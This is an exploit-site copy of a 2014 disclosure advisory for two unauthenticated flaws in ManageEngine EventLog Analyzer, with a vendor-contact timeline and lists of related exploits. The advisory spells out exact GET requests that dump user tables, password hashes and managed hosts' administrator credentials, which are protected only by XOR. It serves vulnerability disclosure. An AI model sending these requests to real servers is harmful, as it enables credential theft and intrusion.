Menu

Search for hundreds of thousands of exploits

"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)"

Author

Exploit author

"Pedro Ribeiro"

Platform

Exploit platform

multiple

Release date

Exploit published date

2014-11-05

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
>> Multiple vulnerabilities in ManageEngine EventLog Analyzer
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 05/11/2014 / Last updated: 05/11/2014

>> Background on the affected product:
"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more."


>> Technical details:
#1
Vulnerability: SQL database information disclosure (read any table in the database)
CVE-2014-6038
Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.

GET /agentHandler?mode=getTableData&table=[tableName]
GET /agentHandler?mode=getTableData&table=AaaUser --> user logins
GET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts
GET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints
GET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)


#2
Vulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure
CVE-2014-6039
Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.

GET /hostdetails?slid=X&hostid=Y
GET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)


A Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released.


>> Fix:
UNFIXED - ManageEngine failed to take action after 70 days.

Timeline of disclosure:
28/08/2014 
- Requested contact to email via ManageEngine Security Response Center
- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload).
           
28/08/2014 
- ManageEngine acknowledge the receipt and promise to keep me informed of the progress.
           
31/08/2014 
- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).
- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with "We appreciate your efforts and will fix your vulnerabilities, please bear with us".
- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10.

11/09/2014
- Asked for an update on progress. Received a response a day after "the development team will include the fix in our next release".

13/10/2014
- Asked for an update on progress. No response.

17/10/2014
- Informed ManageEngine that will release details and an exploit the next day if no reply is received.

19/10/2014
- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible.

05/11/2014
- Informed EventLog support that would release details and exploit today. Received reply stating "we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter".
- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution).


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2018-01-22 "AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution" remote hardware "Pedro Ribeiro"
2017-03-24 "NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)" remote hardware "Pedro Ribeiro"
2017-01-31 "Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2016-12-21 "NETGEAR WNR2000v5 - Remote Code Execution" remote cgi "Pedro Ribeiro"
2016-08-10 "WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2016-08-05 "NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities" remote hardware "Pedro Ribeiro"
2016-04-11 "Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2016-02-04 "NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2015-09-29 "Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)" webapps asp "Pedro Ribeiro"
2015-09-28 "Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload" webapps asp "Pedro Ribeiro"
2015-09-28 "BMC Track-It! 11.4 - Multiple Vulnerabilities" webapps windows "Pedro Ribeiro"
2015-07-15 "Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)" webapps windows "Pedro Ribeiro"
2015-06-10 "SysAid Help Desk 14.4 - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2015-06-10 "ICU library 52 < 54 - Multiple Vulnerabilities" local multiple "Pedro Ribeiro"
2015-04-08 "Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution" webapps jsp "Pedro Ribeiro"
2015-02-09 "ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2015-01-18 "Lorex LH300 Series - ActiveX Buffer Overflow (PoC)" dos hardware "Pedro Ribeiro"
2015-01-15 "ManageEngine Desktop Central - Create Administrator" webapps multiple "Pedro Ribeiro"
2014-12-03 "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download" webapps multiple "Pedro Ribeiro"
2014-11-10 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2014-11-10 "Password Manager Pro / Pro MSP - Blind SQL Injection" webapps multiple "Pedro Ribeiro"
2014-11-09 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2014-11-05 "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)" webapps multiple "Pedro Ribeiro"
2014-10-12 "CMS Made Simple 1.11.9 - Multiple Vulnerabilities" webapps php "Pedro Ribeiro"
2014-10-12 "Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2014-10-12 "GetSimple CMS 3.3.1 - Cross-Site Scripting" webapps php "Pedro Ribeiro"
2014-10-09 "BMC Track-It! - Multiple Vulnerabilities" webapps windows "Pedro Ribeiro"
2014-10-02 "ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)" remote java "Pedro Ribeiro"
2014-09-01 "ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution" webapps jsp "Pedro Ribeiro" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected